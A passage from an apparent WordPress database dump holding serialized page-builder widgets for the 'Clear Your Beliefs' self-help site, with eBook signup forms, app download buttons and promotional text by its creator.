beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1378, 1822, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:70:"[su_posts template="templates/single-post.php" post_type="attachment"]";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1153, 1642, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -108px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1569:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 18px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: 10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul style="margin-left: 18px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2822:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1377, 1821, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:88:"[su_posts template="templates/single-post.php" post_type="attachment" post_status="any"]";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script 